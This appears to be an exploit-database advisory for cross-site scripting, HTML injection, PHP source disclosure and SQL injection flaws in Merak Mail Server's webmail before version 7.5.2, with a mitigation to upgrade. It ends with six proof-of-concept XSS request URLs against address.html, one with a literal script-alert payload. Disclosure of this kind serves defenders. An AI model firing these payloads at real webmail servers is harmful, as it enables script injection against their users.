Multiple Vulnerabilities in Merak Mail Server Webmail Package

vendor:

Webmail Package

by:

7.5

CVSS

HIGH

Cross-site scripting, HTML injection, PHP source code disclosure, SQL injection

79, 80, 98, 89

CWE

Product Name: Webmail Package

Affected Version From: Prior to 7.5.2

Affected Version To: 7.5.2002

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Multiple Vulnerabilities in Merak Mail Server Webmail Package

The webmail package embedded in Merak Mail Server is prone to multiple vulnerabilities, including cross-site scripting, HTML injection, PHP source code disclosure, and SQL injection. These vulnerabilities allow attackers to execute arbitrary script code in the context of the affected site, inject malicious HTML code, disclose sensitive PHP source code, and manipulate SQL queries.

Mitigation:

Upgrade to version 7.5.2 or later.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10966/info

The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.

The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability

These vulnerabilities are reported to exist in versions prior to 7.5.2.

/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=